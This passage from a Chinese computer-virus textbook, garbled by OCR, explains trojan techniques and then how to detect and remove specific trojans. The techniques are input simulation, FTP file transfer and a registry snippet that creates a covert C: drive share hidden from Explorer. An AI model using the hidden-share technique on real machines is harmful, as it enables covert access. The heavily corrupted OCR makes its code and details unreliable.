(3) HKEY_LOCAL_MACHINE: 包含 针对 该 计算 机 (对 于 任何 用 户 ) 的 配置 信息 。 

(4) HKEY_USERS: 存放 计算 机 上 所 有 用 户 的 配置 文件 。 

(5) HKEY_CURRENT_CONFIG: 包含 本 地 计算 机 在 系统 局 动 时 所 用 的 人 硬件 配置 文 
件 信 息 。 

(6) HKEY_DYN_DATA: 记录 系统 运行 时 刻 的 状态 。 

注册 表 按 层次 结构 来 组 织 ,6 个 分 支 名 都 以 HKEY 开头 , 称 为 主键 (Key) ,这 与 资源 管 
理 需 中 的 文件 夹 相 似 , 表 示 主 键 的 图 标 与 文件 夹 的 图 标 一 样 。 每 个 主键 图 标的 左边 有 一 个 
“十 ”图 标 , 单 击 可 将 这 一 分 支 展 开 , 展 开 后 可 以 看 到 主键 还 包含 次 级 主键 (SubKey) 。 当 单 
击 某 一 主键 或 次 级 主键 时 ,右边 窗 格 中 显示 的 是 所 选 主键 内 包含 的 一 个 或 多 个 键 值 (Value) 。 

键 值 由 键 值 名 称 (Vaule Name) 和 数据 (Value Date) 组 成 ,这 就 是 右 窗 口中 的 两 个 列表 
(名 称 数据) 所 表示 的 。 主 键 中 可 以 包含 多 级 的 次 级 主键 ,注册 表 中 的 信息 就 是 按照 多 级 的 
层次 结构 组 织 的 。 每 个 分 支 中 保存 计算 机 系统 软件 或 硬件 之 中 某 一 方面 的 信息 与 数据 。 

注册 表 通 过 键 和 子 键 来 管理 各 种 信息 。 但 是 注册 表 中 的 所 有 信息 都 是 以 各 种 形式 的 键 
值 项 数据 保存 的 。 在 注册 表 编 辑 器 右 窗 格 中 显示 的 都 是 键 值 项 数据 。 这 些 键 值 项 数据 可 以 
分 为 3 种 类 型 。 

(1) 字符 串 值 : 在 注册 表 中 ,字符 串 值 一 般 用 来 表示 文件 的 描述 和 硬件 的 标识 。 通 常 
由 字母 和 数字 组 成 ,也 可 以 是 汉字 ,最 大 长 度 不 能 超过 255 个 字符 。 

(2) 二 进 制 值 : 在 注册 表 中 二 进 制 值 是 没有 长 度 限 制 的 ,可 以 是 任意 字 节 长 。 在 注册 
表 编 辑 器 中 ,二进制 以 十 六 进 制 的 方式 表示 。 

(3) DWORD 值 : 该 值 是 一 个 32 位 (4 字 节 ) 的 数值 。 在 注册 表 编 辑 器 中 也 是 以 十 六 进 
制 的 方式 表示 。 

对 于 木马 等 应 用 程序 ,需要 调用 API 函数 来 操作 注册 表 。API(Application 
Programing Interface) 是 Windows 提供 的 一 个 32 位 环境 下 的 应 用 程序 编程 接口 ,其 中 包括 
了 众多 的 函数 ,提供 了 相当 丰 宣 的 功能 。 在 编制 应 用 程序 时 ,可 以 调用 其 中 的 注册 表 函 数 来 
对 注册 表 进 行 操作 以 实现 我 们 需要 的 功能 。 

3. 远程 屏幕 抓 取 

如 果 想 知道 目标 机 用 户 目 前 在 干什么 ,木马 程序 就 必须 达到 控制 目标 机 的 目的 。 要 知 
道 被 攻击 者 正在 干什么 ,通常 有 两 种 方式 : 第 一 种 是 记录 目标 机 的 键盘 和 上 鼠标 事件 ,形成 一 
个 文本 文件 ,然后 把 该 文件 发 送 到 控制 端 ,最 后 ,控制 端 可 以 通过 查看 文件 的 方式 了 解 被 控 
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制 端的 动作 。 第 二 种 方式 是 在 被 控制 端 抓 取 当前 屏 考 ,形成 一 个 位 图 文件 ,然后 把 该 文件 发 
送 到 控制 端 计 算 机 并 显示 出 来 。 这 种 方式 非常 像 一 个 远程 控制 软件 (PC Anywhere) 。 

实现 远程 屏 硕 抓 取 功 能 是 木马 的 一 个 必 备 技巧 。 屏 颂 抓 取 功 能 的 实现 比较 复杂 ,牵涉 
面 比较 广 , 如 内 存 管 理 技术 、 图 形 存 取 技术 和 图 像 压 缩 传输 技术 等 。 本 书 就 不 作 详 细 介 
绍 了 。 

4. 输入 设备 控制 

在 木马 程序 中 ,木马 使 用 者 可 以 通过 网 络 控制 目标 机 的 鼠标 和 键盘 ,以 达到 模拟 鼠标 和 
键盘 的 功能 ,也 可 以 通过 这 种 方式 启动 或 关闭 被 控制 端的 应 用 程序 。 这 里 将 介绍 编写 程序 
控制 计算 机 鼠标 和 键盘 的 基本 知识 。 模 拟 键 盘 用 Keybd_event API 卫 数 ,模拟 鼠标 按键 用 
mouse_event 困 数 。 在 VC 中 调用 API 曙 数 是 既 简 单 又 方便 的 事 。 下 面 以 VC++ 为 例 介 绍 
如 何 实现 这 两 个 功能 。 

首先 介绍 Keybd_event 图 数 。Keybd_event 能 触发 一 个 按键 事件 ,也 就 是 说 会 产生 一 
个 WM_KEYDOWN 或 WM_KEYUP 消 息 。 当 然 也 可 以 用 产生 这 两 个 消息 的 方法 来 模拟 
按键 ,但 是 没有 直接 用 这 个 图 数 方便 。Keybd_event 共有 4 个 参数 ,第 一 个 为 按键 的 虚拟 键 
值 , 如 Enter 键 为 vk return ,tab 键 为 vk_tab 。 第 二 个 参数 为 扫描 码 ,一 般 不 用 设置 ,用 0 代 
蔡 就 行 。 第 三 个 参数 为 选项 标志 ,如 果 为 keydown 则 设置 为 0 即 可 ,如 果 为 keyup 则 设置 
成 KEYEVENTF_KEYUP。 第 四 个 参数 一 般 也 是 设置 为 0 即 可 。 用 如 下 代码 即 可 实现 模 
拟 按 下 键 的 功能 ,其 中 第 一 个 参数 表示 被 模拟 键 的 虚拟 键 值 ,在 这 里 也 就 是 各 键 对 应 的 键 
码 , 如 'A'=65。 


keybd event(65,0,0,0); 
keybd event(65,0,KEYEVENTF KEYUP, 0); 


mouse_event 最 好 配合 SetCursorPos(Cx,y) 图 数 一 起 使 用 ,与 Keybd_event 类 似 ,mouse 
_event 有 5 个 参数 ,第 一 个 为 选项 标志 ,为 MOUSEEVENTF LEFTDOWN 时 表示 左 键 按 
下 ,为 MOUSEEVENTF_LEFTUP 表示 左 键 松 开 , 回 系统 发 送 相应 消息 。 第 二 和 第 三 个 参 
数 分 别 表示 x、y 相对 位 置 ,一 般 可 设置 为 (0,0)。 第 四 和 第 五 个 参数 并 不 重要 ,一 般 也 可 设 
置 为 (0,0)。 香 要 得 到 mouse_event 图 数 更 详细 的 用 法 可 参考 MSDN 。 下 面 是 关于 mouse 
event 的 示例 代码 。 


POINT lpPoint; 

GetCursorPos(&lpPoint); 
SetCursorPos(lpPoint.x, lpPoint. y); 

mouse event (MOUSEEVENTF LEFTDOWN,0,0,0,0); 
mouse event(MOUSEEVENTF LEFTUP, 0,0,0,0); 


上 面 的 代码 表示 鼠标 的 双击 ,在 要 表示 单 击 ,用 两 个 mouse_event 即 可 (一 次 按 下 ,一 次 
松 开 ) 。 注 意 ,不 管 是 模拟 键盘 还 是 鼠标 事件 ,都 要 注意 还 原 , 即 单 击 后 要 松 开 ,一 个 
keydown 对 应 一 个 keyup。 鼠 标 单 击 完 也 要 松 开 ,不 然 可 能 影 啊 程序 的 功能 。 

5. 远程 文件 管理 

木马 程序 操作 目标 机 文件 的 方式 通常 有 两 种 : 一 种 是 共享 目标 机 的 人 硬盘 ,进行 任意 的 
文件 操作 , 另 一 种 是 把 自己 的 计算 机 配置 为 ETP(CFile Transfer Protocol, 文 件 传输 协议 ) 服 
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务 天 ,再 进行 迁 程 文件 的 管理 ,例如 文件 的 上 传 ( 把 文件 从 目标 机 传 到 控制 病 ) 与 下 载 (把 文 
件 从 控制 端 下 载 到 目标 机 )、 目 录 浏 览 、 文 件 删除 、 文 件 更 名 、 更 改 文件 属性 以 及 执行 文件 等 。 
下 面 将 简单 介绍 FTP 编程 的 基本 知识 。 

要 连接 到 FTP 服务 副 , 需 要 两 个 步骤 。 痛 先 必须 创建 一 个 CInternetSession 对 象 ,用 
类 CInterSession 创建 并 初始 化 一 个 或 几 个 同时 存在 的 Internet 会 话 (Session) ,并 描述 与 代 
理 服务 需 的 连接 (如 果 有 必要 的 话 ) ,如 果 在 程序 运行 期 间 需 要 保持 与 Internet 的 连接 ,可 以 
创建 一 个 CInternetSession 对 象 作 为 类 CWinApp 的 成 员 。 

MFC 中 的 类 CFtpConnection 管理 与 Internet 服务 器 的 连接 ,并 直接 操作 服务 器 上 的 
目录 和 文件 ,FTP 是 MFC 的 WinInet 文 持 的 3 个 Internet 功能 之 一 ,只 要 先 创建 一 个 
CInternetSession 实例 和 一 个 CFtpConnection 对 象 就 可 以 实现 和 一 个 ETP 服务 需 的 通信 ， 
并 且 不 需要 直接 创建 CFtpConnection 对 象 ,而 是 通过 调用 CInternetSession:: GetFtp 
Connection 来 完成 这 项 工作 。 它 创建 CFtpConnection 对 象 并 返回 一 个 指向 该 对 象 的 指针 。 
下 面 首 先 介绍 Ftp 连接 类 的 信息 。 

1) CInternetSession 对 象 

CInternetSession ( LPCTSTR pstrAgent, DWORD dwConText, DWORD dwAccessType, LPCTSTR 
pstrProxyName, LPCTSTR pstrProxyBypass, DWORD dwFlags) 


在 创建 CInternetSession 对 象 时 调用 这 个 成 员 子 数 ,ClInternetSession 是 应 用 程序 第 一 
个 要 调用 的 Internet 函数 , 它 将 初始 化 内 部 数据 结构 ,以 备 将 来 在 应 用 程序 中 调用 。 如 果 
dwFlags 包含 INTERNET_FLAG_ASYNC ,那么 从 这 个 句柄 派生 的 所 有 句柄 ,在 状态 回调 
例 程 注册 之 前 ,都 会 出 现 异 步 状态 。 如 果 没 有 打开 Internet 连接 ,CInternetSession 就 会 抛 
出 一 个 例外 , 即 AfxThorowJInternetException 。 

2) GetFtpConnection() 困 数 


CFtpConnection x* CIternetSession:: GetFtpConnection ( LPCTSTR pstrServer, LPCTSTR 
pstrUserName, LPCTSTR pstrPassword, INTERNET PORT nPort, BOOL bPassive) 


调用 这 个 子 数 建立 一 个 FTP 连接 ,并 获得 一 个 指 问 CFtpConnection 对 象 的 指针 ， 
GetFtpConnection 连接 到 一 个 FTP 服务 需 , 创 建 并 返回 指向 CFtpConnection 对 象 的 指针 ， 
它 不 在 服务 部 上 进行 任何 操作 。 如 果 打 算 读 与 文件 , 则 必须 进行 分 步 操作 。 关 于 查找 打开 
和 读 写 文件 的 信息 需 参 考 CFtpConnection 和 CFtpFileFind 类 。 

对 这 个 困 数 的 调用 返回 一 个 指 回 CFtpConnection 对 象 的 指针 。 如 果 调 用 失败 ,通过 检 
查 抛 出 的 CInternetException 对 象 ,就 可 以 确定 失败 的 原因 。 

3) GetFile() 函数 


BOOL GetFile ( LPCTSTR pstrRemoteFile, LPCTSTR pstrLocalFile, BOOL bFailExists，DWORD dwAttributes, 
DWORD dwFlags, DWORD dwContext ) 


调用 这 个 成 员 函 数 , 可 以 从 FTP 服务 器 取得 文件 ,并 且 把 文件 保存 在 本 地 计算 机 上 。 
GetFile() 隐 数 是 一 个 比较 高 级 的 例 程 , 它 可 以 处 理 所 有 从 FTP 服务 器 读 文件 以 及 把 文件 
存放 在 本 地 计算 机 上 的 有 关 工 作 。 如 果 dwFlags 为 FILE_TRANSFER_TYPE_ASCII, 文 
件数 据 的 传输 也 会 把 控制 和 格式 符 转 化 为 Windows 中 的 等 价 符号 。 默 认 的 传输 模式 是 二 
进 制 模式 ,文件 会 以 和 服务 器 上 相同 的 格式 被 下 载 。 
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pstrRemoteFile 和 pstrLocalFile 可 以 是 相对 于 当前 目录 的 部 分 文件 名 ,也 可 以 是 全 文 
件 名 ,在 这 两 个 名 称 中 间 可 以 用 反 斜 丁 (\) 或 者 正和 斜 枉 (/) 来 作为 文件 名 的 目录 分 隔 符 ， 
GetFile() 在 使 用 前 会 把 目录 分 隔 符 转化 为 适当 的 字符 。 

可 以 用 自己 选择 的 值 来 取代 dwContext 默认 的 值 , 设置 为 上 下 文 标 识 符 与 
CFtpConnection 对 象 的 定位 操作 有 关 , 这 个 操作 由 CFtpConnection 中 的 CInternetSession 
对 象 创建 。 返 回 给 CInternetSession: :OnStatusCallBack 的 值 指 出 了 所 标识 操作 的 状态 。 

如 果 调 用 成 功 ,函数 的 返回 为 非 0, 否 则 返回 为 0; 如 果 调 用 失败 ,可 以 调用 Win32 函数 
GetLastError() 确 认 出 错 的 原因 。 

4) PutFile() 函数 


BOOL PutFile(LPCTSTR pstrLocalFile, LPCTSTR pstrRemoveFile , DWORD dwFlags, DWORD dwContext) 


调用 这 个 成 员 函 数 可 以 把 文件 保存 到 FTP 服务 器 。PutFile() 函 数 是 一 个 比较 高 级 的 
例 程 , 它 可 以 处 理 把 文件 存放 到 服务 右上 的 有 关 工 作 。 如 果 只 发 送 数 据 , 或 要 严格 控制 文件 
传输 的 应 用 程序 ,应 该 调用 OpenFile 和 CInternet:: Write。 利 用 自己 选择 的 值 来 取代 
dwContext 默认 的 值 ,设置 为 上 下 文 标 识 符 ,上 下 文 标识 符 是 CInternetSession 对 象 创建 
的 ,与 CFtpConnection 对 和 象 的 特定 操作 有 关 , 这 个 值 返回 给 CInternetSession:: 
OnStateCallBack, 从 而 把 操作 的 状态 通报 给 它 所 标识 的 上 下 文 。 

如 果 调 用 成 功 ,函数 的 返回 为 非 0, 否 则 返回 为 0; 如 果 调 用 失败 ,可 以 调用 Win32 函数 
GetLastError() 确 认 出 错 的 原因 。 

6. 共享 硬盘 数据 

如 果木 马 程序 仅仅 是 在 目标 机 上 运行 一 些小 程序 ,占用 一 些 内 存 , 那 也 没什么 可 怕 的 。 
可 怕 的 是 它 能 使 目标 机 上 的 人 硬盘 数据 共享 , 梭 露 目标 计算 机 上 的 所 有 资源 ,为 黑客 的 进一步 
攻击 提供 方便 。 用 户 自 己 选择 了 某 个 文件 夹 并 进行 共享 之 后 ,在 “资源 管理 右 ” 中 浏览 目录 
和 文件 时 ,就 会 发 现 该 文件 夹 下 有 一 个 手 一 样 的 图 标 。 但 是 木马 程序 使 硬盘 共享 后 ,在 “ 资 
源 管理 大 ”中 就 看 不 出 来 任何 痕迹 ,十 分 隐蔽 。 

在 此 ,将 介绍 如 何 通 过 程序 实现 鲁 盘 的 共享 ,并 且 在 “资源 管理 带 ” 中 不 留 痕迹 。 同 样 ， 
这 也 是 通过 修改 注册 表 实 现 的 。 


Windows 2000/NT/XP: 

[HKEY LOCAL MACHINE\SYSTEM\ControlSet001\Services\lanmanserver\Shares] 
Windows 9x: 

[HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan] 


在 此 添加 如 下 键 。 
"Flags" // 类 型 
"Path" // 目 录 
"Remark" // 备 注 
"Typen 

"Parmlenc" 


"Parm2enc" 
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实现 C 盘 共享 的 代码 片段 如 下 。 


Result = RegCreateKey(HKEY LOCAL MACHINE, CommonPath + "C:", hCurKey) 
lResult = RegSetValueEx(hCurKey, "Flags", 0&, REG DWORD, 770&, 4) 

lResult = RegSetValueEx(hCurKey, "Type", 0&, REG DWORD, 0&, 4) 

lResult = RegSetValueEx(hCurKey, "Path", 0&, REG SZ, Buff + "\", 6) 
lResult = RegSetValueEx(hCurKey, "Parm2enc", 0&, REG BINARY, &HEB61B41A, 4) 
lResult = RegSetValueEx(hCurKey, "Parmlenc", 0&, REG BINARY, &HEB61B41A, 4) 
lResult = RegSetValueEx(hCurKey, "Remark", 0&, REG SZ, "", 2) 


7. 服务 器 端 程 序 的 包装 

熟悉 “冰河 ”病毒 的 人 都 知道 ,冰河 允许 用 户 目 定义 端口 号 。 这 样 做 的 目的 是 为 了 防止 
日 己 被 反 木 马 程 序 检测 出 来 ,这 种 功能 是 如 何 实现 的 呢 ? 让 我 们 来 做 一 个 实验 : 首先 随意 
找 一 个 可 执行 程序 ,假设 这 个 程序 是 Test. exe; 然后 ,建立 一 个 文本 文件 text. txt, 其 内 容 
为 “This is for test11”; 接着 ,执行 下 列 步骤 。 

进入 命令 行 模 式 下 做 如 下 操作 。 

(1) 输入 “*C:\> type text. txt >> Test. exe”。 

(2) 运行 Test. exe。 

可 以 发 现 Test. exe 仍然 可 以 运行 。 那 么 ,text. txt 的 内 容 “This is for test11” 去 了 哪里 
了 呢 ?” 可 以 用 一 球 较 好 的 编辑 软件 打开 Test. exe 看 看 ,原来 这 段 文字 就 在 Test. exe 文件 
的 最 后 。 木 马 服务 需 端 和 目 定制 的 奥秘 就 是 首先 生成 一 个 EXE 文件 ,这 个 EXE 文件 中 有 一 
项 读 取 日 映 进 程 内 容 的 操作 , 读 取 时 ,文件 的 指针 直接 指向 进程 的 末尾 ,从 末尾 的 倒数 NN 个 
字 节 处 取得 用 户 定制 的 信息 ,如 端口 号 等 ,然后 传递 给 程序 的 相关 部 分 进行 处 理 。 这 里 不 给 
出 相关 的 代码 部 分 ,有 兴趣 的 读者 请 参考 一 些 文件 打包 程序 代码 ,它们 所 使 用 的 技术 是 大 同 
小 异 的 。 


5.4 木马 防 泄 找 术 


5.4.1 防治 特洛伊 木马 基本 知识 


知道 了 木马 的 工作 原理 , 查 杀 木马 就 变 得 相对 容易 了 。 如 果 发 现 有 木马 存在 ,最 安全 也 
是 最 有 效 的 方法 就 是 马上 将 计算 机 与 网 络 断 开 , 防 止 黑客 通过 网 络 对 计算 机 进行 攻击 。 然 
后 再 进行 必要 的 检查 和 杀 除 工作 。 

1. 感染 木马 的 现象 

如 果 计 算 机 有 以 下 表现 ,就 很 可 能 染 上 木马 了 。 计 算 机 有 了 时 死机 ,有 时 又 重新 启动 ; 在 
没有 执行 什么 操作 的 时 候 , 却 在 拼命 谈 写 人 硬盘; 系统 莫名 其 妙 地 对 软驱 进行 搜索 ; 没有 运 
行 大 的 程序 ,而 系统 的 速度 却 越 来 越 慢 , 系 统 资 源 占 用 很 多 。 特 别 是 在 连 和 人 Internet 网 或 是 
局 域 网 后 ,如 果 计 算 机 有 这 些 现象 ,就 应 该 小 心 了 ,当然 也 有 可 能 是 一 些 其 他 的 病毒 在 作怪 。 
木马 程序 的 破坏 通常 需要 里 应 外 合 , 大 多 数 的 木马 不 如 病毒 般 可 怕 。 即 使 运行 了 ,也 不 一 定 
会 对 计算 机 造成 危害 。 不 过 ,潜在 的 危害 还 是 有 的 。 例 如 ,用 户 的 上 网 密码 有 可 能 已 经 在 别 
人 的 收 件 箱 里 了 。 
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2. 发 现 和 杀 除 木马 的 方法 

(1) 端口 扫 摘 。 端 口 扫 摘 是 检查 远程 计算 机 有 无 木马 的 最 好 办 法 , 它 的 原理 非常 简单 ， 
扫 摘 程序 答 试 连接 某 个 闪 口 ,如 果 成 功 , 则 说 明 问 口 开放 ,如 宁 失 败 或 超过 茶 个 特定 的 时 间 
(超时 ), 则 说 明 端 口 关闭 。 但 是 值得 说 明 的 是 ,对 于 驱动 程序 /动态 链接 木马 ,扫描 端口 是 不 
起 作用 的 。 

(2) 查看 连接 。 查 看 连接 和 端口 扫描 的 原理 基本 相同 ,不 过 是 在 本 地 机 上 通过 netstat-a 
(或 某 个 第 三 方 的 程序 ) 查 看 所 有 的 TCP/ UDP 连接 ,查看 连接 要 比 端口 扫描 快 ,缺点 同样 是 无 
法 查 出 驱动 程序 和 动态 链接 木马 ,而且 仅仅 能 在 本 地 使 用 。 

(3) 检查 注册 表 。 在 讨论 木马 的 司 动 方式 时 已 经 提 到 ,木马 可 以 通过 注册 表 局 动 ( 现 在 
大 部 分 的 木马 都 是 通过 注册 表 局 动 的 ,至 少 也 把 注册 表 作 为 一 个 自我 保护 的 方式 ) ,那么 , 同 
样 可 以 通过 检查 注册 表 来 发 现 木 马 ， 冰 河 " 在 注册 表 里 留 下 的 痕迹 请 参照 后 续 曹 节 内 容 。 

(4) 查找 文件 。 查 找 术 马 特 定 的 文件 也 是 一 个 常用 的 方法 。 “冰河 ”的 一 个 特征 文件 是 
kernl32. exe( 伪 装 成 Windows 的 内 核 ), 男 一 个 更 隐蔽 的 文件 是 sysexplr. exe( 伪 装 成 超级 
解 各 程序 )。“ 冰 河 ” 之 所 以 给 这 两 个 文件 定义 这 样 的 名 称 就 是 为 了 更 好 地 伪装 自己 ,只 要 删 
除了 这 两 个 文件 ,冰河 就 不 起 作用 了 。 其 他 的 木马 也 是 一 样 。 对 于 “冰河 ”木马 ,如 果 只 是 删 
除了 sysexplr. exe 而 没有 做 扫尾 工作 ,可 能 会 遇 到 一 些 有 麻烦, 例如 ,文本 文件 打 不 开 了 ,原因 
是 sysexplr. exe 是 和 文本 文件 关联 的 ,还 必须 把 文本 文件 跟 notepad 关联 上 。 

(5) 杀 病 毒 软件 。 对 于 新 出 现 的 木马 , 杀 病 毒 软件 没有 太 大 的 作用 ,包括 一 些 号 称 专 杀 
木马 的 软件 同样 如 此 。 不 过 对 于 过 时 的 木马 以 及 水 平 较 差 的 木马 还 是 有 点 用 处 的 ,值得 一 
提 的 是 Iparmor。 这 个 软件 在 这 一 方面 可 以 称 得 上 是 比较 领先 的 , 它 采 用 了 监视 动态 链接 
库 的 技术 ,可 以 监视 所 有 调用 Winsock 的 程序 ,并 可 以 动态 杀 除 进程 ,是 一 个 个 人 防御 的 好 
工具 。 

(6) 系统 文件 检查 希 。 另 外 ,对 于 驱动 程序 和 动态 链接 库 木 马 , 有 一 种 方法 可 以 竹 试 ， 
即使 用 Windows 的 “系统 文件 检查 硕 ”。 它 可 检测 操作 系统 文件 的 完整 性 ,如 果 这 些 文件 损 
坏 ,检查 天 可 以 将 其 还 原 , 并 且 还 可 以 从 安装 盘 中 解压 缩 已 压缩 的 文件 (如 驱动 程序 ) 。 如 果 
驱动 程序 或 动态 链接 库 在 没有 升级 的 情况 下 被 改动 了 ,就 有 可 能 是 木马 (或 者 损坏 了 ) 造 成 
的 ,替换 改动 过 的 文件 可 以 保证 系统 的 安全 和 稳定 。 


各 注意 


(1) 如 果木 蕊 正在 运行 , 则 无 法 删除 其 程序 ,这 时 可 以 重启 动 到 DOS 方式 然后 将 其 删除 。 

(2) 有 的 木马 会 自动 检查 其 在 注册 表 中 的 自 启动 项 ,如 果 是 在 木马 处 于 活动 时 删除 该 
项 它 能 自动 恢复 ,这 时 可 以 重启 到 DOS 下 将 其 程序 删除 后 再 进入 Windows 下 将 其 注册 表 
中 的 自 启动 项 删除 。 

(3) 在 进行 删除 操作 和 注册 表 修 改 操作 前 一 定 要 先 备 份 。 

3. 木马 的 预防 措施 

如 何 防 止 再 次 中 木马 程序 呢 ? 这 里 作者 给 出 一 些 防范 后 门 的 经 验 。 

(1) 永远 不 要 执行 任何 来 历 不 明 的 软件 或 程序 ,除非 确信 自己 的 计算 机 水 平 达到 了 百 
毒 不 侵 的 地 步 。 谨 愤 对 待 就 是 下 载 后 先 用 杀毒 软件 检查 一 遍 , 确 定 没 有 问题 后 青 执行 和 使 


160 计算 机 病毒 与 恶意 代码 一 一 原理 ,技术 及 防范 (第 4 版 ) 


用 。 许 多 网 友 就 是 懒得 进行 这 几 秒 钟 的 检查 , 才 中 木马 的 。 轻 则 被 侵入 者 删 了 系统 文件 , 重 
波 系 统 , 重 则 数据 全 无 ,甚至 被 人 破译 上 网 账号 。 

(2) 永远 不 要 相信 目 己 的 邮箱 不 会 收 到 垃圾 邮件 和 病毒 ,即使 目 己 的 邮箱 或 ISP 邮箱 
从 未 露面 ,有 些 时 候 永远 没 办 法 知道 别人 如 何 得 知 日 己 的 E-mail 地 址 的 。 

(3) 永远 不 要 因为 对 方 是 你 的 好 朋友 就 轻易 执行 他 发 过 来 的 软件 或 程序 ,因为 你 不 确 
信 他 是 否 炙 上 了 病毒 防火 墙 ,也 许 你 的 朋友 中 了 黑客 程序 但 还 不 知道 ,同时 ,你 也 不 能 确保 
是 否 有 别人 冒 他 的 名 给 你 发 E-mail。 

(4) 千 万 不 要 随便 留 下 个 人 资料 ,因为 不 知道 是 否 有 人 会 处 心 积 虑 将 它 收 集 起 来 。 

(5) 千 万 不 要 轻易 相信 和 网络 上 认识 的 新 朋友 ,因为 在 网 络 上 ,对 方 都 是 虚拟 存在 的 ,你 
不 能 保证 对 方 是 否 想 利用 你 做 实验 品 。 

(6) 永远 不 要 以 为 网 络 上 谁 也 不 认识 谁 就 出 言 不 人 还, 这 样 会 不 小 心 营 恼 菜 些 可 能 会 侵 
犯 你 计算 机 系统 的 黑客 。 


5.4.2 几 种 常见 木马 病毒 的 杀 除 方法 


1. BO2000 

查看 注册 表 | HEKY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\ 
RunServicse] 中 是 否 存 在 Umgr32. exe 的 键 值 。 有 则 将 其 删除 。 重 新 启动 计算 机 ,并 将 
\Windows\System 中 的 Umgr32. exe 删除 。 

2. NetSpy( 网 络 精灵 ) 

国产 木马 ,默认 连接 端口 为 7306 。 在 该 版 本 中 新 添加 了 注册 表 编 辑 功能 和 浏览 硕 监 控 
功能 ,客户 端 现在 可 以 不 用 NetMonitor ,通过 IE 或 Navigate 就 可 以 进行 远程 监控 了 。 其 强 
大 之 处 丝毫 不 逊色 于 冰河 和 BO2000。 服 务 端 程序 被 执行 后 ,会 在 C:\Windows\System 目 
录 下 生成 netspy. exe 文件 。 同 时 在 注册 表 [ HKEY LOCAL MACHINE\ Software\ 
Microsoft\Windows\CurrentVersion\Run|] 下 建立 键 值 C:\windows\system\netspy. exe， 
用 于 在 系统 局 动 时 日 动 加 载运 行 。 

NetSpy 的 清除 方法 如 下 。 

(1) 进入 DOS, 在 C:\Windows\SystemA\ 目 录 下 输入 命令 “del netspy. exe” 并 按 
Enter 键 。 

(2) 进入 注册 表 HKEY LOCAL MACHINE\Software\Microsoft\Windows\Current 
VersionN\Run ,删除 Netspy. exe 和 Spynotify. exe 的 键 值 即 可 安全 清除 NetSpy。 

3. NetBus( 网 络 公 牛 ) 

国产 木马 ,默认 连接 端口 为 2344。 服 务 端 程序 newserver. exe 运行 后 ,会 日 动 脱 元 成 
checkdll. exe,; 位 于 C:\WINDOWS\SYSTEM 下 ,下 次 开机 checkdll. exe 将 月 动 运行 ,因此 
很 隐蔽 ,人 危害 很 大 。 同 时 ,服务 端 运行 后 会 日 动 捆绑 以 下 文件 。 

(1) Windows 9x 下 : 捆绑 notepad. exe、write. exe、regedit. exe、winmine. exe、winhelp. exe。 

(2) Windows NT/Windows 2000 下 : 捆绑 notepad. exe、 regedit. exe, reged32. exe、 
drwtsn32. exe .winmine. exe。 


服务 端 运 行 后 还 会 捆绑 在 开机 时 目 动 运行 的 第 三 方 软件 (如 realplay. exe、QQ.、ICQ 
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等 ) 上 。 在 注册 表 中 网 络 公牛 也 悄悄 地 扎 下 了 根 。 


[HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Run] 
"CheckD11. exe" = "C:\WINDOWS\SYSTEM\CheckD]11. exe" 

[HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] 
"CheckD11. exe" = "C:\WINDOWS\SYSTEM\CheckD]1]1. exe" 

[HKEY USERS\. DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run] 
"CheckD11. exe" = "C:\WINDOWS\SYSTEM\CheckD]1]1. exe" 


网 络 公 牛 没有 采用 文件 关联 功能 ,而 是 采用 文件 捆绑 功能 ,和 上 面 所 列 出 的 文件 捆绑 在 
一 块 ,要 清除 非常 困难 。 

NetBus 的 清除 方法 如 下 。 

(1) 删除 网 络 公 和牛 的 自 启 动 程序 C:\WINDOWS\SYSTEM\CheckDIl. exe。 

(2) 把 网 络 公 牛 在 注册 表 中 所 建立 的 键 值 全 部 删除 (上 面 所 列 出 的 那些 键 值 全 部 删除 )。 

(3) 检查 上 面 列 出 的 文件 ,如 果 发 现 文件 长 度 发 生变 化 (增加 了 40KB 左右 ,可 以 通过 
与 其 他 计算 机 上 的 正和 党 文件 比较 而 知 ) ,就 删除 它们 。 然 后 选择 “开始 一” 附件 ?一 "系统 工 
具 ” 一 “系统 信息 ?一 “工具 ?一 “系统 文件 检查 需 ” 命 令 ,在 弹出 的 对 话 框 中 选中 ”从 安装 软盘 
提取 一 个 文件 ”, 在 文本 框 中 输入 要 提取 的 文件 (前 面 删除 的 文件 ) , 单 击 “ 确 定 ” 按 钮 ,然后 按 
屏幕 提示 将 这 些 文件 恢复 即 可 。 如 果 是 开机 时 有 自动 运行 的 第 三 方 软件 ,如 realplay. exe、 
QQ ICQ 等 被 捆绑 上 了 , 那 就 得 把 这 些 软 件 色 载 , 表 重 新 安 沪 。 

4. Asylum 

Asylum 木马 程序 修改 了 system. ini 和 win. ini 两 个 文件 , 先 查 一 下 system. ini 文件 下 
面 的 LBOOTjJ 项 ,看 看 是 否 存 在 “shell 二 explorer. exe”, 如 不 是 则 删除 它 , 改 回 上 面 的 设置 ， 
并 记 下 原来 的 文件 名 以 便 在 纯 DOS 下 删除 它 。 再 打开 win. ini 文件 ,看 在 Lwindowsj 项 下 
的 “run 二 ”是 不 是 有 什么 文件 名 ,一般 情况 下 是 没有 任何 加 载 值 的 ,如 果 有 则 记 下 它 , 以 便 在 
纯 DOS 下 删除 相应 的 文件 名 。 

5. 冰河 

“冰河 "标准 版 的 服务 硕 端 程序 为 G-server. exe, 客 户 闪 程 序 为 G-client. exe, 默 认 连 接 
端口 为 7626。 一 有 旦 运行 G-server, 那 么 该 程序 就 会 在 C:\Windows\system 目录 下 生成 
kernel32. exe 和 sysexplr. exe 并 删除 和 目 身 。kernel32. exe 在 系统 启动 时 日 动 加 载运 行 ， 
sysexplr. exe 和 TXT 文件 关联 ,即使 删除 了 kernel32. exe, 但 只 要 打开 TXT 文件 ， 
sysexplr. exe 就 会 被 激活 , 它 将 再 次 生成 kernel32. exe, 于 是 “冰河 ”又 回来 了 。 这 就 是 “ 冰 
河 ” 屡 删 不 止 的 原因 。 

“冰河 "的 清除 方法 为 : 用 纯 DOS 局 动 系统 (以 防 木 马 的 日 动 恢复 ) 删 除 安 婆 的 
Windows 下 的 system\kernel32. exe 和 system\sysexplr. exe 两 个 木马 文件 ,注意 如 果 系 统 
提示 不 能 删除 它们 ,是 因为 木马 程序 目 动 设置 了 这 两 个 文件 的 属性 ,只 需 先 改 掉 它们 的 隐 
